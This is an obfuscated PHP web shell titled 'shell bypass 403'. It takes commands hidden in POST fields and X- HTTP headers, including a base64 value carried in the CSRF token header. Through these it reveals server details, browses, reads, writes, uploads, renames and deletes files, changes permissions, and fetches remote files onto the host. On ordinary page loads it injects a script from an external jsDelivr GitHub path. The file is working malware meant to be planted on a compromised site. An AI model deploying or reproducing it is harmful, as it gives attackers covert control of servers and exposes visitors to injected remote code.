shell bypass 403
489495df<?PHP
error_reporting(0);
define("wVvnh", $_SERVER["DOCUMENT_ROOT"]);
$AUPxJ = array();
function OgdHN($d42kl)
{
return function_exists($d42kl);
}
function Ikh8F($d42kl)
{
return file_get_contents($d42kl);
}
function JNWVm($d42kl, $g9A10)
{
return file_put_contents($d42kl, $g9A10) !== false;
}
function jXNsL()
{
if (OgdHN("getcwd")) {
return @getcwd();
} else {
return @dirname(__FILE__);
}
}
function jKlKs($lJUcO)
{
if (is_dir($lJUcO)) {
$mEtL2 = sCaNDir($lJUcO);
foreach ($mEtL2 as $NTbjO) {
if (!($NTbjO == "." || $NTbjO == "..")) {
$HN0e6 = $lJUcO . "/" . $NTbjO;
is_dir($HN0e6) ? jKlks($HN0e6) : uNliNk($HN0e6);
} else {
}
}
rMdIR($lJUcO);
} else {
uNliNk($lJUcO);
}
}
function crMPH($fc25O, $mNV4l)
{
if (OgdHN("curl_init")) {
$ZmJ33 = curl_init($mNV4l);
$vvFJO = fopen($fc25O, "w+");
curl_setopt($ZmJ33, CURLOPT_FILE, $vvFJO);
curl_setopt($ZmJ33, CURLOPT_TIMEOUT, 50);
if (curl_exec($ZmJ33)) {
curl_close($ZmJ33);
$NTbjO = 1;
} else {
$NTbjO = fwrite($vvFJO, ikH8F($mNV4l)) ? 1 : 0;
}
fclose($vvFJO);
} else {
$NTbjO = @JNWVM($fc25O, ikh8F($mNV4l)) ? 1 : 0;
}
return $NTbjO;
}
function njEvC($g9A10)
{
return !empty($_POST[$g9A10]) ? $_POST[$g9A10] : $_SERVER["HTTP_X_" . strtoupper($g9A10)];
}
$d42kl = nJeVc("a");
if (!empty($d42kl)) {
$s3swg = !empty($_POST["v"]) ? $_POST["v"] : @$_SERVER["HTTP_X_CSRF_TOKEN"];
if (!empty($s3swg)) {
$s3swg = base64_decode(substr($s3swg, 1));
}
$FKlCT = nJEvc("d");
$xBSZA = array();
$g9A10 = 1;
switch ($d42kl) {
case 1:
$xBSZA = array("root" => wVvnh, "server" => $_SERVER["SERVER_SOFTWARE"], "cip" => $_SERVER["REMOTE_ADDR"]);
if (OgDhn("getcwd")) {
$xBSZA["pwd"] = jxNSl();
}
if (ogDhn("ini_get")) {
$xBSZA["safe_mode"] = @ini_get("safe_mode");
}
if (OgDhn("phpversion")) {
$xBSZA["version"] = @phpversion();
}
$xBSZA["sip"] = $_SERVER["SERVER_ADDR"];
if (!empty($xBSZA["sip"])) {
} else {
$xBSZA["sip"] = @gethostbyname($_SERVER["SERVER_NAME"]);
}
break;
case 2:
if (empty($s3swg)) {
$s3swg = jxnsl();
}
$bF9FM = scandir($s3swg);
$aE_6r = array();
$zA6Pt = array();
foreach ($bF9FM as $PvbI8) {
if (!($PvbI8 == "." || $PvbI8 == "..")) {
$lJUcO = $s3swg . "/" . $PvbI8;
$FF2RW = array("n" => $PvbI8, "p" => substr(sprintf("%o", fILepErMs($lJUcO)), -4), "t" => date("Y-m-d H:i:s", fILeMTiMe($lJUcO)));
if (is_dir($lJUcO)) {
$aE_6r[] = $FF2RW;
} else {
$FF2RW["s"] = filesize($lJUcO);
$zA6Pt[] = $FF2RW;
}
} else {
}
}
$xBSZA["d"] = $aE_6r;
$xBSZA["f"] = $zA6Pt;
break;
case 3:
jKlKs($s3swg);
break;
case 4:
$xBSZA["v"] = IkH8F($s3swg);
break;
case 5:
if (!is_writable($FKlCT)) {
@chmod($s3swg, 0644);
}
$g9A10 = JnWvm($FKlCT, $s3swg) ? 1 : 0;
break;
case 6:
$fc25O = $FKlCT . nJeVC("n");
$wGFtd = $FKlCT . $s3swg;
$JPZwT = @FiLemTiME($fc25O);
if (!@ReNamE($fc25O, $wGFtd)) {
$g9A10 = 0;
} else {
if ($JPZwT) {
@touCH($wGFtd, $JPZwT, $JPZwT);
} else {
}
}
break;
case 7:
if (@chmod($FKlCT, $s3swg)) {
} else {
$g9A10 = 0;
}
break;
case 8:
$g9A10 = move_uploaded_file($_FILES["f"]["tmp_name"], $s3swg) ? 1 : 0;
break;
case 9:
$g9A10 = JNWVm($s3swg, '') ? 1 : 0;
break;
case 10:
$g9A10 = mkdir($s3swg) ? 1 : 0;
break;
case 11:
$mNV4l = NjEvc("l");
$g9A10 = cRmPh($s3swg, $mNV4l) ? 1 : 0;
break;
}
$AUPxJ["data"] = $xBSZA;
$AUPxJ["code"] = $g9A10;
header("Content-type: application/json; charset=utf-8");
register_shutdown_function(function () {
goto i6xSq;
YsR1E:
echo json_encode($AUPxJ);
goto vWtzT;
i6xSq:
global $AUPxJ;
goto xmDig;
xmDig:
ob_end_clean();
goto YsR1E;
vWtzT:
});
return;
}
echo "<script type=\"module\" src=\"https://cdn.jsdelivr.net/gh/dionjo/bkskb/4.js\"></script>";